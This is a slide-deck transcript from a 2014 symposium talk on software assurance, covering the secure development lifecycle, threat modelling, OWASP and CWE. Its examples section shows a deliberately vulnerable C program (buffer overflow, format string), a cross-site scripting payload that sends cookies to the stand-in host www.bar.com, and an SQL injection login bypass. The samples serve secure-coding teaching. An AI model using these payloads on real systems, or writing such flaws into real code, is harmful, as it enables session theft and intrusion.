SlideShare a Scribd company logo
1 of 63
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 1
Collin College – North Texas Cyber Security Symposium
Software Assurance (SwA)
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 2
#define BUFSIZE 256
int main(int argc, char **argv) {
char buf[BUFSIZE];
strcpy(buf, argv[1]);
printf(buf);
}
Writing Code is So Easy, Right?
• See anything wrong with this simple C-language program?
• Later in the presentation, we will enumerate the flaws
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 3
Agenda
• What is Software Assurance (SwA)?
• Why is SwA important?
• When are SwA principles applied?
• What are some SwA best practices?
• May I see some examples, please?
• Summary
• Q&A
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 4
Collin College – North Texas Cyber Security Symposium
Question 1: What is Software Assurance (SwA)?
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 5
Let’s Begin with Information Assurance (IA)
C I
A
= Confidentiality
= Integrity
= Availability
C
I
A
Information Assurance (IA) – Measures that protect and defend information
and information systems by ensuring their availability, integrity, authentication,
confidentiality, and non-repudiation. These measures include providing for
restoration of information systems by incorporating protection, detection, and
reaction capabilities.
Identification – Who are you?
Authentication – Prove your identity
Authorization – What are you allowed to do?
Accountability – Record all security relevant activities for subsequent review
Non-repudiation – You cannot prove that a security relevant event was not
undertaken by an entity bearing your identity
• Confidentiality – Prevent
unauthorized disclosure of
information
• Integrity – Ensure that
information is not altered in an
unauthorized manner
• Availability – Make information
available to authorized users,
even when under attack
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 6
Some IA Framework Domains – SwA is One
Written, distributed, and enforced IA policies and procedures
Risk management
Risk assessment
Control selection
Control implementation
Control monitoring
Physical security
Operational security
Subjects (both people and software): identification, authentication, authorization
Objects: access control
Crypto key management
Continuous monitoring (IDS, IPS, DLP) leading to situational awareness
Incident management & disaster recovery
Configuration management (operational environment)
Patch management
Personnel security
Education, training, and awareness
Clearances
Separation of duties
Rotation of duties
Activity monitoring
Component security
HW counterfeit protection
HW anti-tamper
Software assurance
Supply chain assurance
Supplier practices
Product assurance
Configuration management (development environment)
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 7
What is Application Security?
Application Security IS NOT:
• Network Security, Firewalls, Intrusion Detection
Systems, Operating System Hardening,
Database Hardening, etc.
- These are all useful and necessary to ensure the
overall security of the Enterprise, but they
address different risks
• Common myths
- “We have a firewall!”
- It’s an “Internal Application”
- It’s protected by SSO
• An afterthought
• Out of scope or a “nice to have”
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 8
What is Application Security?
Application Security IS:
• Providing reliable, confidential, and valid
information at the application layer
• e.g., Securing the “custom code” that drives
a web application
• “Built In” not “Bolted On”
- Application Security needs to be built into the
application throughout the software
development lifecycle.
- It should not be an afterthought after designing,
developing, and deploying a solution
• A requirement and a responsibility
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 9
How is SwA Formally Defined?
• Synonymous with Application Security,
Secure Software, and Secure Application
Development… a lifecycle endeavor
CNSSI 4009, “National Information Assurance (IA) Glossary”,
Entry for Software Assurance (SwA)
- “Level of confidence that software is free from vulnerabilities, either
intentionally designed into the software or accidentally inserted at anytime
during its lifecycle and that the software functions in the intended manner.”
- In other words, the software does what it’s supposed to do
 Meets all requirements
- But the software does not do things it’s not supposed to do
 No Easter eggs, no backdoors
 No vulnerabilities introduced by poor coding practices
Synonymous with Application
Security, Secure Software,
and Secure Application
Development…
SwA is a lifecycle endeavor
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 10
SAFECode is a non-profit organization that promotes the best practices of proven
software assurance methods. They define the three pillars of SwA as follows
SAFECode Three Pillars of Software Assurance
• Security – Software is developed in
accordance with secure lifecycle
development principles
• Authenticity – The recipient of the software is
provided a level of confidence that the
software originated with the expected source
• Integrity – The recipient of the software is
provided means to verify that the software
was not altered in any way by any party
during transit through the supply chain
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 11
SwA Addresses
Trustworthiness
Predictable
Execution
Conformance
Planned and systematic set of
multi-disciplinary activities that
ensure software processes and
products conform to
requirements, standards /
procedures
Justifiable confidence that
software, when executed,
functions as intended
https://buildsecurityin.us-cert.gov
DHS Software and
Supply Chain
Assurance
Build Security In
No exploitable
vulnerabilities exist, either
maliciously or
unintentionally inserted
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 12
SwA Addresses
Trustworthiness
Predictable
Execution
Conformance
Planned and systematic set of
multi-disciplinary activities that
ensure software processes and
products conform to
requirements, standards /
procedures
Justifiable confidence that
software, when executed,
functions as intended
No exploitable
vulnerabilities exist, either
maliciously or
unintentionally inserted
https://buildsecurityin.us-cert.gov
DHS Software and
Supply Chain
Assurance
Build Security In
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 13
SwA Addresses
Trustworthiness
Predictable
Execution
Conformance
Planned and systematic set of
multi-disciplinary activities that
ensure software processes and
products conform to
requirements, standards /
procedures
Justifiable confidence that
software, when executed,
functions as intended
No exploitable
vulnerabilities exist, either
maliciously or
unintentionally inserted
https://buildsecurityin.us-cert.gov
DHS Software and
Supply Chain
Assurance
Build Security In
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 14
It is also important to understand that software assurance
is the responsibility of many disciplines, including…
SwA is Much More Than Just Writing Code
• Program Management
• Systems Engineering
• Software Engineering
• Security Engineering
• Supply Chain
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 15
Collin College – North Texas Cyber Security Symposium
Question 2: Why is SwA important?
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 16
Software Applications - The New Attack Target
• Application security has often been
ignored, in part because of the faulty
assumption that firewalls and other
perimeter defenses can protect the
functional code.
• The problem is further compounded as
application developers without specific
security training are typically unaware of
the ways their software, while meeting
functional requirements, could be
compromised.
• As the operating system and network
security vulnerabilities have been
reduced over time, applications have
become the next attack target.
Today the attackers are targeting the applications
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 17
Internet DMZ
Trusted
Inside
Corporate
Inside
HTTP(S)
SMTP
SSL Firewall only
allows PORT 80
(or 443 SSL)
traffic from the
Internet to the
web server.
Any – Web
Server: 80
Firewall only
allows
applications
on the web
server to talk to
application
server.
Firewall only
allows application
server to talk to
database server.
IIS
Sun ONE
Apache/Tomcat
ASP
.NET
WebSphere
Java
SQL
Oracle
DB2
FTP
TELNET
Vulnerable applications expose the internal network.
Here is an example of vulnerability risks, even with perimeter defenses in place.
The diagram shows several firewalls constructed at different points of access
with a network.
Applications Breach the Perimeter
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 18
• The consequences of a security breach are detrimental
- Information is a valuable asset to the Company and we need to protect the
way we access and modify it
- Application Security has a direct effect on the Company's profit
- Application Security has a direct effect on the Company's reputation
The Impact of Vulnerable Applications
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 19
Collin College – North Texas Cyber Security Symposium
Question 3: When are SwA principles applied?
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 20
SwA Spans The Entire Development Lifecycle
It’s NOT just about writing code!
Training
• Software
Assurancefor
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat,Attack
Surface,and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 21
Source: The Economic Impacts of Inadequate Infrastructure for Software Testing, NIST, May 2002,
http://www.nist.gov/director/planning/upload/report02-3.pdf
Pay Me Now ($), or Pay Me Later ($$$)
Hours to Fix Defects by Development PhaseHours to Fix Defects by Development Phase
Addendum
• Security
• Cost ~ Hrs to fix
+ Penalties
+ Brand repair
+ ???
NIST study
• Quality
• Cost ~ Hrs to fix
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 22
Microsoft Secure Development Lifecycle
Ongoing Process Improvements
ProcessEducation Accountability
http://www.microsoft.com/security/sdl/default.aspx
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 23
Collin College – North Texas Cyber Security Symposium
Question 4: What are some SwA best practices?
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 24
• Software developers should be trained in
assured software development practices
• Software managers should be trained to
understand and advocate software
assurance.
• Software assurance should be treated as an
integrated, required part of the software
development life cycle process.
• Software assurance should be included in
program reviews for projects that require
developed software
Industry Best Practices
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 25
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
Training and Awareness
Train SW leads, develop community of SwA SMEs
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 26
• Government
- DHS / DoD Build Security In Web Site
• Industry
- SAFECode One Hour Training Videos
- Lone Star Application Security Conference (LASCON)
 Held in Austin TX, sponsored by Austin OWASP Chapter
 Focus on web application security
 Often preceded by 1-3 days of relevant SwA training
Available Training
Click Here
Click Here
Click Here
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 27
Lots of Reference Help is Available
• For Awareness and Guidance
- DHS / DoD Build-Security-In Pocket Guide series
- https://buildsecurityin.us-cert.gov/swa/software-assurance-pocket-guide-series
• For Developers
- MITRE CWE
 Common Weakness Enumeration
 http://cwe.mitre.org
- SANS / CWE Top 25 Most Dangerous Software Errors
 See MITRE CWE
 http://www.sans.org/top25-software-errors
- OWASP Top Ten
 Focused on web applications (increased attack surface)
 https://www.owasp.org/index.php/Top_10_2013-Top_10
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 28
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
Requirements Management
There’s functional security requirements… and then there’s the “ilities”
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 29
Common General Concepts
• Economy of Mechanism
- Keep the design as simple and small as possible.
(Keep it simple stupid)
• Least Common Mechanism
- Minimize the amount of mechanism common to more
than one user and depended on by all users. (Opposite
of Economy of Mechanism.)
• Complete Mediation
- Every access to every object must be checked for
authority.
• Failing Securely
- Base access decisions on permission rather than
exclusion.
• Psychological Acceptability
- It is essential that the human interface be designed for
ease of use, so that users routinely and automatically
apply the protection mechanisms correctly.
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 30
SAFE Code Secure Design Principles
• Threat Modeling
• Use Least Privilege
• Implement Sandboxing
• Secure Coding Practices
• Validate Input and Output to
Mitigate Common Vulnerabilities
• Use Robust Integer Operations
for Dynamic Memory Allocations
and Array Offsets
• Use Anti-Cross Site Scripting
(XSS) Libraries
• Use Canonical Data Formats
• Avoid String Concatenation for
Dynamic SQL Statements
• Eliminate Weak Cryptography
• Use Logging and Tracing
Source: http://www.safecode.org/publications/SAFECode_Dev_Practices0211.pdf
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 31
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
Threat Analysis and Attack Surface
Essential during architecture and high-level design
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 32
Threat Analysis
 Who? – Adversary characterization
 What? – Threat categories
 Where? – Attack surface analysis
 How? – Attack trees
 All the above? – Attack Patterns
Know Your Enemy
and
Think Like An Attacker
Threat Analysis
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 33
• Script kiddies – Low-skilled, unfunded, just for fun
• Identity thieves – Highly skilled, business model,
financial motives
• Nation states – Very highly skilled, very highly funded,
political and military objectives, theft of corporate IP
• Hactivists – Ranging skills, lightly funded, highly
motivated by social or political objectives
Who – Threat Actors
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 34
STRIDE is an acronym that stands for the six threat categories documented in
Howard and Leblanc’s Writing Secure Code. STRIDE stands for the following:
Swiderski, F. & Snyder, W. Threat Modeling. Redmond, WA: Microsoft Press, 2004
Spoofing
Can the
software or end
user be tricked
into seeing
some data as
something
other than what
it actually is?
Examples
include packet
spoofing and
user interface
spoofing.
Tamperingwithdata
Can someone
that shouldn’t
have access to
modifying or
deleting the
data do so?
Repudiation
Is it possible to
prove which
actions a user
has taken? For
example, are
important
actions logged
and are the
logs accurate? Informationdisclosure
Is only
necessary
information
given to users?
Can the
additional
information
reveal
information
about the target
system or
users?
Denialofservice
Is an attacker
able to prevent
legitimate users
from accessing
the application?
Elevationofprivilege
Is an attacker
able to perform
actions that
only higher-
privileged users
should be
allowed to
perform?
What – STRIDE Threat Categories
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 35
• Attack Surface = Accessible entry points and exit points of an
application or system
- Entry points are the inputs to the application through
interfaces, services, protocols, and code
- Exit points are the outputs from the application, including
error messages produced by the application in response to
user interaction
• Goal: Reduce the attack surface of the software application or
system
- Disable unused services and protocols
- Generic error messages
Where – Attack Surface Analysis
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 36
• The aim for secure development is to
reduce the overall risk by reducing the
attack surface area.
• One can reduce the attack surface area
by:
- Reducing the amount of code
executing
 Turn off features
- Reducing the volume of code
accessible to users
 Least privilege
- Limit the damage if the code is
exploited
How to Minimize Attack Surface Area
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 37
• Provides a formal method of
modeling threats against a
computer system or
SW application
• Root node = Goal
• Leaf nodes are different
ways of achieving the goal
• Child nodes are Sub-Goals
- Ex. “Learn Password”
• All sub-goals must be
satisfied before the main
goal is achieved
Threaten Blackmail Steal Bribe
Log into Unix
Account
Learn
Password
Guess
Password
Use Widely
Known
Password
Find Written
Password
Get Password
From Target
Install Keyboard
Sniffer
Obtain Sniffer
Output File
No
Password
Required
and
How – Attack Trees
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 38
• The MITRE Corporation
- Government sponsored
non-profit organization
- Federally Funded
Research and
Development Center
(FFRDC)
• Software Assurance Strategic
Initiative
- Department of
Homeland Security
- Co-sponsored by the
National Cyber Security
Division
• Database of attack
methods used by hackers
to exploit software
• Understand how
weaknesses and
vulnerabilities lead to a
compromise
Mechanism of Attack
Data Leakage Attacks
Resource Depletion
Injection
Spoofing
Time and State Attacks
Abuse of Functionality
Probabilistic Techniques
Exploitation of Authentication
Exploitation of Privilege/Trust
Data Structure Attacks
Resource Manipulation
Physical Security Attacks
Network Reconnaissance
Social Engineering Attacks
Supply Chain Attacks
CAPEC – Common Attack Pattern
and Enumeration Classification
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 39
CAPEC – Common Attack Pattern
and Enumeration Classification
• Probing an
application
through its error
messages
- Fuzzing input
parameters to
cause errors
- Learn about the
system
 Error
Messages
 System
behavior
Description
Attack Prerequisites
Typical Likelihood of Exploit
Examples – Instances
Attacker Skills or Knowledge
Required
Resources Required
Indicators – Warnings of
Attack
Obfuscation Techniques
* Solutions and Mitigations *
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 40
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
Misuse / Abuse Case Modeling
Think like an attacker
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 41
Misuse Case Diagram
• Start with use cases (white hat)
• “Think like a bad guy” (black hat)
• For each use case, ask “How
might an attacker try to exploit
this use case?
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 42
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
Implementation
SwA is not all about writing code… but it is a lot about writing code
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 43
CERT Top 10 Secure Coding Practices
Adopt a secure coding
standard
Use effective quality
assurance techniques
Practice defense in depth
Sanitize data sent to
other systems
Adhere to the principle of
least privilege
Default denyKeep it simple
Architect and design for
security policies
Heed compiler warnings
Adhere to the principle of
least privilege
Validate Input
Heed compiler warnings
Architect and design for
security policies
Keep it simple
Default deny
Sanitize data sent to
other systems
Practice defense in depth
Use effective quality
assurance techniques
Adopt a secure coding
standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 44
• Software Engineering
Institute (SEI) – Carnegie
Mellon University
- Federally Funded
Research and
Development Center
(FFRDC)
• Computer Emergency
Response Team (CERT)
- The Morris Worm
11/1988
 The first Internet
worm
 Wide mainstream
media attention
• Secure coding standards
- C, C++, Java and Perl
SEI-CERT Secure Coding Standards
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 45
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
SAST – Static Analysis Security Tool
Coverity, HP-Fortify, Klocwork, Parasoft, Veracode, AdaCore (Ada)
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 46
• The 2011 CWE/SANS Top 25 Most Dangerous
Programming Errors is a list of the most widespread and
critical programming errors that can lead to serious
software vulnerabilities.
Common Weakness Enumeration (CWE)
Source: http://cwe.mitre.org
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 47
2013 OWASP Top 10
1. Injection
2. Broken Authentication and Session
Management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access
Control
8. Cross Site Request Forgery (CSRF)
9. Using Components with Known
Vulnerabilities
10. Unvalidated Redirects and Forwards
The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-
profit charitable organization focused on improving the security of software
https://www.owasp.org/index.php/Top_10_2013-Top_10
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 48
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
Third Party Manual Code Reviews
Sorry, it cannot all be automated
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 49
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
Dynamic Test
Executable code now required
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 50
 White Box Testing
 Typically have access to design docs, source code etc.
 Static source code analysis
 Dynamic source code analysis
 Black Box Testing
 Limited to no knowledge of the design
 No access to source code
 Fuzzing
 Send random and malformed data, inputs etc to the
application
 Penetration Testing
 Typically performed after an application has been deployed
 Actual attack that attempts to compromise an application
 and others…
Types of Security Testing
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 51
Training
• Software
Assurance for
Managers
• Software
Assurance
Practitioner
• Cyber
Professional
• CSSLP
Initiation,
Development
and Acquisition
• Threat, Attack
Surface, and
Misuse Case
Modeling
• Requirements
Management
• IBM Rational
Doors
Implementation
and Assessment
• Static Source
Code Analysis
• Static Binary
Code Analysis
• Dynamic Binary
Analysis
• 3rd Party Reviews
Operations and
Maintenance
Disposal
Certified Software
Management
• Continuous
Assessment
• Patching
• Configuration
Management
• 3rd Party
Reviews
Whole
System
Monitoring
• Detection
• Correlation
• Visualization
• Response
Lifecycle Operations, Support, and Disposal
SwA activity does not end until system End-Of-Life (EOL)
• Secure Coding
Standard
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 52
Collin College – North Texas Cyber Security Symposium
Question 5: May I see some examples, please?
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 53
So What’s So Bad about This Small C-program?
#define BUFSIZE 256
int main(int argc, char **argv) {
char buf[BUFSIZE];
strcpy(buf, argv[1]);
printf(buf);
}
• Remember this simple C-language program?
Code does not check argc for
number of arguments… potential
null pointer dereference (CWE-476)
Buffer of 256 bytes does not allocate
space for null-terminator (CWE-193)
Code does not validate content of
argv[1] in any way (CWE-20)
Buffer copy without checking
size of destination buffer
(CWE-120)
Attacker can exploit code that does not provide a format string
as the first argument to printf() functions… (CWE-134)
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 54
Buffer Overflow
“Smashing the Stack for Fun and Profit”
#define BUFSIZE 256
int main(int argc, char **argv) {
char buf[BUFSIZE];
strcpy(buf, argv[1]);
}
OOPS!
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 55
Cross-Site Scripting – The Beginning
• Consider the URL:
• What hello.jsp looks like:
• And the returned page is:
http://www.foo.com/hello.jsp?name=John+Doe
<html><body>
Hello <%=request.getAttribute(“name”);%>
</body></html>
<html><body>
Hello John Doe
</body></html>
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 56
Cross-Site Scripting – User Turns Mischievous
• And if the URL is:
• And the returned page is:
• Then the user’s cookies for www.foo.com will pop up in
an alert box on their screen
• Who cares if someone can pop windows up on your
screen – This is no big deal right?
http://www.foo.com/hello.jsp?name=<script>alert(document.cook
ie)</script>
<html><body>
Hello <script>alert(document.cookie)<script>
</body></html>
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 57
Cross-Site Scripting – User Turns Malicious
• What if the URL is:
• And the returned page is:
• The user’s cookies have just been stolen by the
malicious user at www.bar.com through Cross-Site
Scripting and a “web bug”
http://www.foo.com/hello.jsp?name=<script>document.write(‘<im
g src=“http://www.bar.com/images/webbug.gif?cookie=’+
document.cookie+’”>’)</script>
<html><body>
Hello <script>document.write(‘<img
src=“http://www.bar.com/images/webbug.gif?’+
document.cookie+’”>’)</script>
</body></html>
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 58
SQL Injection – The Beginning
• Examine a very simple example of SQL Injection by
considering the URL:
• For the purposes of this application lets say it is used
to edit the account details for a given user and
retrieves the details for the user with the query:
http://www.foo.com/edit.jsp?uid=test&password=secret
SELECT * FROM usertable WHERE uid=‘test’ AND
password=‘secret’;
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 59
SQL Injection – User Turns Malicious
• Now consider a slightly different query designed with
malicious purposes in mind:
• The consequences of adding a SQL comment (--) may
be devastating, allowing the user to access the admin
account with the evaluated SQL below:
• Ignoring the comment (“--“ and all that follows), the
SQL below is equivalent and gets all attributes for user
“admin”… possibly including its hashed password!
http://www.foo.com/edit.jsp?uid=admin’;--&password=whatever
SELECT * FROM usertable WHERE uid=‘admin’;--’ AND
password=‘whatever’;
SELECT * FROM usertable WHERE uid=‘admin’;
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 60
Collin College – North Texas Cyber Security Symposium
Summary
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 61
• Software Assurance is becoming a requirement,
especially for US DoD contracts
BE PREPARED!
• The challenge is yours – will you commit to developing
software in a secure fashion to protect the interests of
customers, our nation, and all who use your software?
Summary
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 62
Questions?
Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 63
Presenter Bio
John Whited, Principal Engineer, Raytheon,
has 5 years of experience in Cybersecurity
with expertise in Software Assurance (SwA)
and secure development life cycles (SDLC).
Prior to joining Raytheon, he was a software
and a systems engineer in commercial
telephony, holding five US patents on
Intelligent Networks. He is also a CISSP and a
CSSLP. He is a graduate of Texas Tech
University with a Bachelors of Science and a
Masters of Science in Electrical Engineering.
He has made two joint presentations at the
RSA Security Conference (2010 and 2012).
E-mail: john.whited@raytheon.com

More Related Content

What's hot

NTXISSACSC2 - The Role of Threat Intelligence and Layered Security for Intrus...
NTXISSACSC2 - The Role of Threat Intelligence and Layered Security for Intrus...NTXISSACSC2 - The Role of Threat Intelligence and Layered Security for Intrus...
NTXISSACSC2 - The Role of Threat Intelligence and Layered Security for Intrus...North Texas Chapter of the ISSA
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Sqrrl
 
Journey to the Cloud: Securing Your AWS Applications - April 2015
Journey to the Cloud: Securing Your AWS Applications - April 2015Journey to the Cloud: Securing Your AWS Applications - April 2015
Journey to the Cloud: Securing Your AWS Applications - April 2015Alert Logic
 
Incident response live demo slides final
Incident response live demo slides finalIncident response live demo slides final
Incident response live demo slides finalAlienVault
 
DTS Solution - Building a SOC (Security Operations Center)
DTS Solution - Building a SOC (Security Operations Center)DTS Solution - Building a SOC (Security Operations Center)
DTS Solution - Building a SOC (Security Operations Center)Shah Sheikh
 
Outpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24
 
Top 5 Cloud Security Predictions for 2016
Top 5 Cloud Security Predictions for 2016 Top 5 Cloud Security Predictions for 2016
Top 5 Cloud Security Predictions for 2016 Alert Logic
 
CIS Security Benchmark
CIS Security BenchmarkCIS Security Benchmark
CIS Security BenchmarkRahul Khengare
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)Ahmed Ayman
 
Emerging Threats and Strategies of Defense
Emerging Threats and Strategies of Defense Emerging Threats and Strategies of Defense
Emerging Threats and Strategies of Defense Alert Logic
 
HPE Protect 2016 - Fearlessly Innovate
HPE Protect 2016 - Fearlessly InnovateHPE Protect 2016 - Fearlessly Innovate
HPE Protect 2016 - Fearlessly Innovatescoopnewsgroup
 
Shared Security Responsibility in the AWS Public Cloud
Shared Security Responsibility in the AWS Public CloudShared Security Responsibility in the AWS Public Cloud
Shared Security Responsibility in the AWS Public CloudAlert Logic
 
Big Data Analytics for Cyber Security: A Quick Overview
Big Data Analytics for Cyber Security: A Quick OverviewBig Data Analytics for Cyber Security: A Quick Overview
Big Data Analytics for Cyber Security: A Quick OverviewFemi Ashaye
 
Outpost24 Webinar - DevOps to DevSecOps: delivering quality and secure develo...
Outpost24 Webinar - DevOps to DevSecOps: delivering quality and secure develo...Outpost24 Webinar - DevOps to DevSecOps: delivering quality and secure develo...
Outpost24 Webinar - DevOps to DevSecOps: delivering quality and secure develo...Outpost24
 
Next-Generation SIEM: Delivered from the Cloud
